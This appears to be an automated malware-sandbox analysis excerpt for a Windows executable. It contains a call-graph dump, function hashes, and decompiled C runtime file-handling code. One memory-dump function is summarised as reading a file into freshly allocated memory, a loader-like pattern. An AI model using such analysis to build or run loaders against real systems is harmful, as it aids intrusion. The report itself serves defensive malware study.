10488 409070 10563 4090a7 10488->10563 10494 409264 GetCPInfo 10493->10494 10495 40932d 10493->10495 10494->10495 10500 40927c 10494->10500 10497 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10495->10497 10499 4093df 10497->10499 10499->10477 10504 40a6b1 10500->10504 10503 40dbb3 43 API calls 10503->10495 10505 40806f __wsopen_s 39 API calls 10504->10505 10506 40a6d1 10505->10506 10507 409936 __wsopen_s MultiByteToWideChar 10506->10507 10511 40a6fe 10507->10511 10508 40a78d 10510 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10508->10510 10509 40a785 10524 40a7b2 10509->10524 10513 4092e4 10510->10513 10511->10508 10511->10509 10512 40a663 __fread_nolock 15 API calls 10511->10512 10515 40a723 __fread_nolock __alloca_probe_16 10511->10515 10512->10515 10519 40dbb3 10513->10519 10515->10509 10516 409936 __wsopen_s MultiByteToWideChar 10515->10516 10517 40a76c 10516->10517 10517->10509 10518 40a773 GetStringTypeW 10517->10518 10518->10509 10520 40806f __wsopen_s 39 API calls 10519->10520 10521 40dbc6 10520->10521 10528 40d9c4 10521->10528 10525 40a7be 10524->10525 10527 40a7cf 10524->10527 10526 408654 ___free_lconv_mon 14 API calls 10525->10526 10525->10527 10526->10527 10527->10508 10529 40d9df 10528->10529 10530 409936 __wsopen_s MultiByteToWideChar 10529->10530 10534 40da23 10530->10534 10531 40db9e 10532 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10531->10532 10533 409305 10532->10533 10533->10503 10534->10531 10535 40a663 __fread_nolock 15 API calls 10534->10535 10537 40da49 __alloca_probe_16 10534->10537 10548 40daf1 10534->10548 10535->10537 10536 40a7b2 __freea 14 API calls 10536->10531 10538 409936 __wsopen_s MultiByteToWideChar 10537->10538 10537->10548 10539 40da92 10538->10539 10539->10548 10556 40af2a 10539->10556 10542 40db00 10544 40db89 10542->10544 10546 40a663 __fread_nolock 15 API calls 10542->10546 10549 40db12 __alloca_probe_16 10542->10549 10543 40dac8 10545 40af2a 6 API calls 10543->10545 10543->10548 10547 40a7b2 __freea 14 API calls 10544->10547 10545->10548 10546->10549 10547->10548 10548->10536 10549->10544 10550 40af2a 6 API calls 10549->10550 10551 40db55 10550->10551 10551->10544 10552 4099f0 __wsopen_s WideCharToMultiByte 10551->10552 10553 40db6f 10552->10553 10553->10544 10554 40db78 10553->10554 10555 40a7b2 __freea 14 API calls 10554->10555 10555->10548 10557 40aba0 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 10556->10557 10558 40af35 10557->10558 10559 40af87 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 10558->10559 10561 40af3b 10558->10561 10560 40af7b LCMapStringW 10559->10560 10560->10561 10561->10542 10561->10543 10561->10548 10562->10488 10573 404e01 10563->10573 10565 4090c9 10566 404e01 __fread_nolock 39 API calls 10565->10566 10567 4090e8 10566->10567 10568 40907d 10567->10568 10569 408654 ___free_lconv_mon 14 API calls 10567->10569 10570 40909b 10568->10570 10569->10568 10587 409f46 LeaveCriticalSection 10570->10587 10572 409089 10572->10462 10574 404e12 10573->10574 10577 404e0e __fread_nolock 10573->10577 10575 404e19 10574->10575 10579 404e2c __fread_nolock 10574->10579 10576 407b2a __dosmaperr 14 API calls 10575->10576 10578 404e1e 10576->10578 10577->10565 10580 406527 __wsopen_s 39 API calls 10578->10580 10579->10577 10581 404e63 10579->10581 10582 404e5a 10579->10582 10580->10577 10581->10577 10585 407b2a __dosmaperr 14 API calls 10581->10585 10583 407b2a __dosmaperr 14 API calls 10582->10583 10584 404e5f 10583->10584 10586 406527 __wsopen_s 39 API calls 10584->10586 10585->10584 10586->10577 10587->10572 10589 4061b2 10588->10589 10590 4061c0 10588->10590 10589->10590 10595 4061d8 10589->10595 10591 407b2a __dosmaperr 14 API calls 10590->10591 10592 4061c8 10591->10592 10593 406527 __wsopen_s 39 API calls 10592->10593 10594 4061d2 10593->10594 10594->10409 10595->10594 10596 407b2a __dosmaperr 14 API calls 10595->10596 10596->10592 10598 4054f3 10597->10598 10602 4054c4 10597->10602 10599 40550a 10598->10599 10601 408654 ___free_lconv_mon 14 API calls 10598->10601 10600 408654 ___free_lconv_mon 14 API calls 10599->10600 10600->10602 10601->10598 10602->10411 10621 40471c 10603->10621 10606 404b34 10607 404b47 __wsopen_s 10606->10607 10672 4048c5 10607->10672 10610 40427b __wsopen_s 39 API calls 10611 401056 10610->10611 10612 4046ec 10611->10612 10613 4046ff __wsopen_s 10612->10613 10707 403fe0 10613->10707 10616 40427b __wsopen_s 39 API calls 10617 401062 10616->10617 10617->10197 10778 404d64 10618->10778 10624 404728 ___scrt_is_nonwritable_in_current_image 10621->10624 10622 40472f 10623 407b2a __dosmaperr 14 API calls 10622->10623 10625 404734 10623->10625 10624->10622 10626 40474f 10624->10626 10627 406527 __wsopen_s 39 API calls 10625->10627 10628 404761 10626->10628 10629 404754 10626->10629 10633 401043 10627->10633 10638 407b3d 10628->10638 10630 407b2a __dosmaperr 14 API calls 10629->10630 10630->10633 10633->10606 10634 404771 10636 407b2a __dosmaperr 14 API calls 10634->10636 10635 40477e 10646 4047bc 10635->10646 10636->10633 10639 407b49 ___scrt_is_nonwritable_in_current_image 10638->10639 10650 409efe EnterCriticalSection 10639->10650 10641 407b57 10651 407be1 10641->10651 10647 4047c0 10646->10647 10671 4066ba LeaveCriticalSection 10647->10671 10649 4047d1 10649->10633 10650->10641 10658 407c04 10651->10658 10652 407c5c 10653 4085f7 _unexpected 14 API calls 10652->10653 10654 407c65 10653->10654 10656 408654 ___free_lconv_mon 14 API calls 10654->10656 10657 407c6e 10656->10657 10659 40aedf __wsopen_s 6 API calls 10657->10659 10663 407b64 10657->10663 10658->10652 10658->10658 10658->10663 10667 4066a6 EnterCriticalSection 10658->10667 10668 4066ba LeaveCriticalSection 10658->10668 10660 407c8d 10659->10660 10669 4066a6 EnterCriticalSection 10660->10669 10664 407b9d 10663->10664 10670 409f46 LeaveCriticalSection 10664->10670 10666 40476a 10666->10634 10666->10635 10667->10658 10668->10658 10669->10663 10670->10666 10671->10649 10673 4048d1 ___scrt_is_nonwritable_in_current_image 10672->10673 10674 4048d7 10673->10674 10676 40491a 10673->10676 10675 4064aa __wsopen_s 39 API calls 10674->10675 10677 4048f2 10675->10677 10683 4066a6 EnterCriticalSection 10676->10683 10677->10610 10679 404926 10684 404a48 10679->10684 10681 40493c 10693 404965 10681->10693 10683->10679 10685 404a5b 10684->10685 10686 404a6e 10684->10686 10685->10681 10696 40496f 10686->10696 10688 404a91 10692 404b1f 10688->10692 10700 408386 10688->10700 10691 4068d4 __wsopen_s 41 API calls 10691->10692 10692->10681 10706 4066ba LeaveCriticalSection 10693->10706 10695 40496d 10695->10677 10697 404980 10696->10697 10699 4049d8 10696->10699 10698 406894 __fread_nolock 41 API calls 10697->10698 10697->10699 10698->10699 10699->10688 10701 404abf 10700->10701 10702 40839f 10700->10702 10701->10691 10702->10701 10703 40656b __fread_nolock 39 API calls 10702->10703 10704 4083bb 10703->10704 10705 40cf99 __wsopen_s 64 API calls 10704->10705 10705->10701 10706->10695 10708 403fec ___scrt_is_nonwritable_in_current_image 10707->10708 10709 403ff3 10708->10709 10710 404014 10708->10710 10711 4064aa __wsopen_s 39 API calls 10709->10711 10718 4066a6 EnterCriticalSection 10710->10718 10714 40400c 10711->10714 10713 40401f 10719 404060 10713->10719 10714->10616 10718->10713 10725 404092 10719->10725 10721 40402e 10722 404056 10721->10722 10777 4066ba LeaveCriticalSection 10722->10777 10724 40405e 10724->10714 10726 4040a1 10725->10726 10727 4040c9 10725->10727 10728 4064aa __wsopen_s 39 API calls 10726->10728 10729 40656b __fread_nolock 39 API calls 10727->10729 10730 4040bc __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 10728->10730 10731 4040d2 10729->10731 10730->10721 10739 406876 10731->10739 10734 40417c 10742 404482 10734->10742 10737 404193 10737->10730 10754 4042b7 10737->10754 10761 4066ce 10739->10761 10743 404491 __wsopen_s 10742->10743 10744 40656b __fread_nolock 39 API calls 10743->10744 10746 4044ad __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 10744->10746 10745 401ba5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10747 40418b 10745->10747 10748 406876 43 API calls 10746->10748 10753 4044b9 10746->10753 10747->10730 10749 40450d 10748->10749 10750 40453f ReadFile 10749->10750 10749->10753 10751 404566 10750->10751 10750->10753 10752 406876 43 API calls 10751->10752 10752->10753 10753->10745 10755 40656b __fread_nolock 39 API calls 10754->10755 10756 4042ca 10755->10756 10757 406876 43 API calls 10756->10757 10760 404314 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 10756->10760 10758 404371 10757->10758 10759 406876 43 API calls 10758->10759 10758->10760 10759->10760 10760->10730 10762 4066da ___scrt_is_nonwritable_in_current_image 10761->10762 10763 4040f0 10762->10763 10764 40671d 10762->10764 10765 406763 10762->10765 10763->10730 10763->10734 10763->10737 10766 4064aa __wsopen_s 39 API calls 10764->10766 10772 40a0f7 EnterCriticalSection 10765->10772 10766->10763 10768 406769 10769 40678a 10768->10769 10770 4067f3 __fread_nolock 41 API calls 10768->10770 10773 4067eb 10769->10773 10770->10769 10772->10768 10776 40a1ac LeaveCriticalSection 10773->10776 10775 4067f1 10775->10763 10776->10775 10777->10724 10779 404d70 ___scrt_is_nonwritable_in_current_image 10778->10779 10780 404dba 10779->10780 10781 404d83 __fread_nolock 10779->10781 10790 4010a1 10779->10790 10791 4066a6 EnterCriticalSection 10780->10791 10783 407b2a __dosmaperr 14 API calls 10781->10783 10785 404d9d 10783->10785 10784 404dc4 10792 404b6e 10784->10792 10788 406527 __wsopen_s 39 API calls 10785->10788 10788->10790 10791->10784 10794 404b80 __fread_nolock 10792->10794 10798 404b9d 10792->10798 10793 404b8d 10795 407b2a __dosmaperr 14 API calls 10793->10795 10794->10793 10794->10798 10801 404bde __fread_nolock 10794->10801 10796 404b92 10795->10796 10797 406527 __wsopen_s 39 API calls 10796->10797 10797->10798 10805 404df9 10798->10805 10799 404d09 __fread_nolock 10802 407b2a __dosmaperr 14 API calls 10799->10802 10800 404e01 __fread_nolock 39 API calls 10800->10801 10801->10798 10801->10799 10801->10800 10803 40656b __fread_nolock 39 API calls 10801->10803 10804 407510 __fread_nolock 51 API calls 10801->10804 10802->10796 10803->10801 10804->10801 10808 4066ba LeaveCriticalSection 10805->10808 10807 404dff 10807->10790 10808->10807 11948 406af7 11949 406b02 11948->11949 11950 406b12 11948->11950 11954 406b18 11949->11954 11953 408654 ___free_lconv_mon 14 API calls 11953->11950 11955 406b33 11954->11955 11956 406b2d 11954->11956 11958 408654 ___free_lconv_mon 14 API calls 11955->11958 11957 408654 ___free_lconv_mon 14 API calls 11956->11957 11957->11955 11959 406b3f 11958->11959 11960 408654 ___free_lconv_mon 14 API calls 11959->11960 11961 406b4a 11960->11961 11962 408654 ___free_lconv_mon 14 API calls 11961->11962 11963 406b55 11962->11963 11964 408654 ___free_lconv_mon 14 API calls 11963->11964 11965 406b60 11964->11965 11966 408654 ___free_lconv_mon 14 API calls 11965->11966 11967 406b6b 11966->11967 11968 408654 ___free_lconv_mon 14 API calls 11967->11968 11969 406b76 11968->11969 11970 408654 ___free_lconv_mon 14 API calls 11969->11970 11971 406b81 11970->11971 11972 408654 ___free_lconv_mon 14 API calls 11971->11972 11973 406b8c 11972->11973 11974 408654 ___free_lconv_mon 14 API calls 11973->11974 11975 406b9a 11974->11975 11980 406944 11975->11980 11981 406950 ___scrt_is_nonwritable_in_current_image 11980->11981 11996 409efe EnterCriticalSection 11981->11996 11983 406984 11997 4069a3 11983->11997 11985 40695a 11985->11983 11987 408654 ___free_lconv_mon 14 API calls 11985->11987 11987->11983 11988 4069af 11989 4069bb ___scrt_is_nonwritable_in_current_image 11988->11989 12001 409efe EnterCriticalSection 11989->12001 11991 4069c5 11992 406be5 _unexpected 14 API calls 11991->11992 11993 4069d8 11992->11993 12002 4069f8 11993->12002 11996->11985 12000 409f46 LeaveCriticalSection 11997->12000 11999 406991 11999->11988 12000->11999 12001->11991 12005 409f46 LeaveCriticalSection 12002->12005 12004 4069e6 12004->11953 12005->12004 12009 40b081 12010 40b09a 12009->12010 12011 40b0b8 12009->12011 12010->12011 12012 407a01 44 API calls 12010->12012 12013 407951 2 API calls 12010->12013 12012->12010 12013->12010 12040 401199 12041 4011a1 12040->12041 12057 4059f5 12041->12057 12043 4011ac 12064 401499 12043->12064 12045 401754 4 API calls 12046 401243 12045->12046 12047 4011c1 __RTC_Initialize 12055 40121e 12047->12055 12070 401626 12047->12070 12049 4011da 12049->12055 12073 4016e0 InitializeSListHead 12049->12073 12051 4011f0 12074 4016ef 12051->12074 12053 401213 12080 405bc6 12053->12080 12055->12045 12056 40123b 12055->12056 12058 405a04 12057->12058 12059 405a27 12057->12059 12058->12059 12060 407b2a __dosmaperr 14 API calls 12058->12060 12059->12043 12061 405a17 12060->12061 12062 406527 __wsopen_s 39 API calls 12061->12062 12063 405a22 12062->12063 12063->12043 12065 4014a5 12064->12065 12066 4014a9 12064->12066 12065->12047 12067 401754 4 API calls 12066->12067 12069 4014b6 ___scrt_release_startup_lock 12066->12069 12068 40151f 12067->12068 12069->12047 12087 4015f9 12070->12087 12073->12051 12122 4060e3 12074->12122 12076 401700 12077 401707 12076->12077 12078 401754 4 API calls 12076->12078 12077->12053 12079 40170f 12078->12079 12081 406c30 _unexpected 39 API calls 12080->12081 12082 405bd1 12081->12082 12083 405c09 12082->12083 12084 407b2a __dosmaperr 14 API calls 12082->12084 12083->12055 12085 405bfe 12084->12085 12086 406527 __wsopen_s 39 API calls 12085->12086 12086->12083 12088 401608 12087->12088 12089 40160f 12087->12089 12093 405ef6 12088->12093 12096 405f73 12089->12096 12092 40160d 12092->12049 12094 405f73 42 API calls 12093->12094 12095 405f08 12094->12095 12095->12092 12099 405cbf 12096->12099 12100 405ccb ___scrt_is_nonwritable_in_current_image 12099->12100 12107 409efe EnterCriticalSection 12100->12107 12102 405cd9 12108 405d1a 12102->12108 12104 405ce6 12118 405d0e 12104->12118 12107->12102 12109 405d35 12108->12109 12110 405da8 _unexpected 12108->12110 12109->12110 12111 405d88 12109->12111 12112 40b002 42 API calls 12109->12112 12110->12104 12111->12110 12113 40b002 42 API calls 12111->12113 12114 405d7e 12112->12114 12115 405d9e 12113->12115 12117 408654 ___free_lconv_mon 14 API calls 12114->12117 12116 408654 ___free_lconv_mon 14 API calls 12115->12116 12116->12110 12117->12111 12121 409f46 LeaveCriticalSection 12118->12121 12120 405cf7 12120->12092 12121->12120 12123 406101 12122->12123 12127 406121 12122->12127 12124 407b2a __dosmaperr 14 API calls 12123->12124 12125 406117 12124->12125 12126 406527 __wsopen_s 39 API calls 12125->12126 12126->12127 12127->12076 12140 405b9f 12143 405b26 12140->12143 12144 405b32 ___scrt_is_nonwritable_in_current_image 12143->12144 12151 409efe EnterCriticalSection 12144->12151 12146 405b6a 12152 405b88 12146->12152 12147 405b3c 12147->12146 12149 40ab1c __wsopen_s 14 API calls 12147->12149 12149->12147 12151->12147 12155 409f46 LeaveCriticalSection 12152->12155 12154 405b76 12155->12154

                                                                                              Executed Functions

                                                                                              Function 00A408B7 Relevance: 6.4, APIs: 4, Instructions: 375COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 362 a408b7-a409c0 call a4005f call a40838 call a40073 * 8 384 a409c7-a409d7 362->384 385 a409c2 362->385 388 a409de-a40a01 CreateFileW 384->388 389 a409d9 384->389 386 a40d7d-a40d80 385->386 390 a40a03 388->390 391 a40a08-a40a2e VirtualAlloc ReadFile 388->391 389->386 390->386 392 a40a35-a40a48 391->392 393 a40a30 391->393 395 a40d67-a40d76 call a4020a 392->395 396 a40a4e-a40d62 392->396 393->386 399 a40d78-a40d7a ExitProcess 395->399
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocNumaVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4233825816-0
                                                                                              • Opcode ID: 32afd6d44ae02c654ecb9089867e9c64d78d898b3b174a388106d7ab326123eb
                                                                                              • Instruction ID: b47b2121f56397704c454b918ff986a32cdf8ce922ac1d069a23e5f91774e352
                                                                                              • Opcode Fuzzy Hash: 32afd6d44ae02c654ecb9089867e9c64d78d898b3b174a388106d7ab326123eb
                                                                                              • Instruction Fuzzy Hash: 63F18524C4D2D9ADDF02CBE995157FCBFB05F26202F0841D6E5E4B6283C53A874AEB25
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A407DA Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 523 a407da-a40820 call a4005f call a40073 GetSystemInfo 529 a40822-a40825 523->529 530 a40829 523->530 531 a4082b-a4082e 529->531 530->531
                                                                                              APIs
                                                                                              • GetSystemInfo.KERNELBASE(?), ref: 00A407F7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315515134.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_a40000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 31276548-0
                                                                                              • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                              • Instruction ID: ef98add2cae0f8704159f2412ea6de4b5c7cf19c0221a3aa6455d273fe49db0b
                                                                                              • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                              • Instruction Fuzzy Hash: 98F0A076E1410CAFDB08EAB89A45EBEB7BCDB88300F10467DEB06E2241E534854092E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004018B6 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 533 4018b6-4018c1 SetUnhandledExceptionFilter
                                                                                              C-Code - Quality: 100%
                                                                                              			E004018B6() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E004018C2); // executed
				return _t1;
			}




                                                                                              0x004018bb
                                                                                              0x004018c1

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_000018C2,00401251), ref: 004018BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.315286538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.315268209.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315303639.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.315321247.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_400000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: d753a184e5cab8ca1aa237c727fd6782fd136c053f1122fd69643d6906652b1b
                                                                                              • Instruction ID: bc35250c4e22a904d418e0dbca4639679522cc51467fd5348e9456102b5011c1
                                                                                              • Opcode Fuzzy Hash: d753a184e5cab8ca1aa237c727fd6782fd136c053f1122fd69643d6906652b1b
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040C377 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 38%
                                                                                              			E0040C377(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v40;
				signed int _v48;
				void _v52;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				signed int _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E0040C0C5(__ecx,  &_v76, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v52, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t191 + _t191;
				_t264 = _t263 | 0xffffffff;
				if(_v40 != _t264) {
					_t114 = E0040A1CF(_t188, _t249, _t264, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v24 = _v24 & 0x00000000;
						_v28 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v20 =  !(_a16 >> 7) & 1;
						_push( &_v28);
						_push(_a12);
						memcpy(_t276,  &_v52, 1 << 2);
						_t196 = 0;
						_t122 = E0040C030(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v52;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v52 | 0x00000040;
								}
								_v5 = _t124;
								E0040A11A(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v16 = _t241;
								_v52 = _t241;
								 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x418ec0 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v5 = 0;
									_push( &_v5);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v52, _t205 << 2);
									_t134 = E0040BDDA(_t189,  &_v52 + _t205 + _t205,  &_v52);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(_t267 == 0) {
										 *((char*)( *((intOrPtr*)(0x418ec0 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v5;
										 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v16 & 0x00000048;
										if((_v16 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0x418ec0 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v48;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v48 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v28);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v52, _t214 << 2);
											_t246 = E0040C030();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0x418ec0 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00407AD0(GetLastError());
											 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E0040A2E2( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E0040C23F(_t204,  *_t189);
									__eflags = _t267;
									if(_t267 == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E0040E660();
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00407AD0(_t271);
							 *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0x418ec0 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00407B2A())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v48;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0x418ec0 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00407AD0(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v48 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v28);
						_push(_a12);
						memcpy(_t285,  &_v52, _t238 << 2);
						_t196 = 0;
						_t253 = E0040C030();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00407B17()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00407B2A())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00407B17()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00407B2A()));
				}
			}
























































                                                                                              0x0040c39a
                                                                                              0x0040c39e
                                                                                              0x0040c39f
                                                                                              0x0040c39f
                                                                                              0x0040c39f
                                                                                              0x0040c3a1
                                                                                              0x0040c3a7
                                                                                              0x0040c3c2
                                                                                              0x0040c3c7
                                                                                              0x0040c3ca
                                                                                              0x0040c3cc
                                                                                              0x0040c3ce
                                                                                              0x0040c3ed
                                                                                              0x0040c3f4
                                                                                              0x0040c3fb
                                                                                              0x0040c3fe
                                                                                              0x0040c40a
                                                                                              0x0040c40d
                                                                                              0x0040c415
                                                                                              0x0040c416
                                                                                              0x0040c419
                                                                                              0x0040c419
                                                                                              0x0040c41b
                                                                                              0x0040c420
                                                                                              0x0040c422
                                                                                              0x0040c425
                                                                                              0x0040c42d
                                                                                              0x0040c430
                                                                                              0x0040c49d
                                                                                              0x0040c49e
                                                                                              0x0040c4a4
                                                                                              0x0040c4a6
                                                                                              0x0040c4ef
                                                                                              0x0040c4f2
                                                                                              0x0040c4fb
                                                                                              0x0040c4fe
                                                                                              0x0040c501
                                                                                              0x0040c503
                                                                                              0x0040c503
                                                                                              0x0040c503
                                                                                              0x0040c4f4
                                                                                              0x0040c4f7
                                                                                              0x0040c4f7
                                                                                              0x0040c508
                                                                                              0x0040c50b
                                                                                              0x0040c517
                                                                                              0x0040c51c
                                                                                              0x0040c528
                                                                                              0x0040c532
                                                                                              0x0040c536
                                                                                              0x0040c540
                                                                                              0x0040c543
                                                                                              0x0040c54e
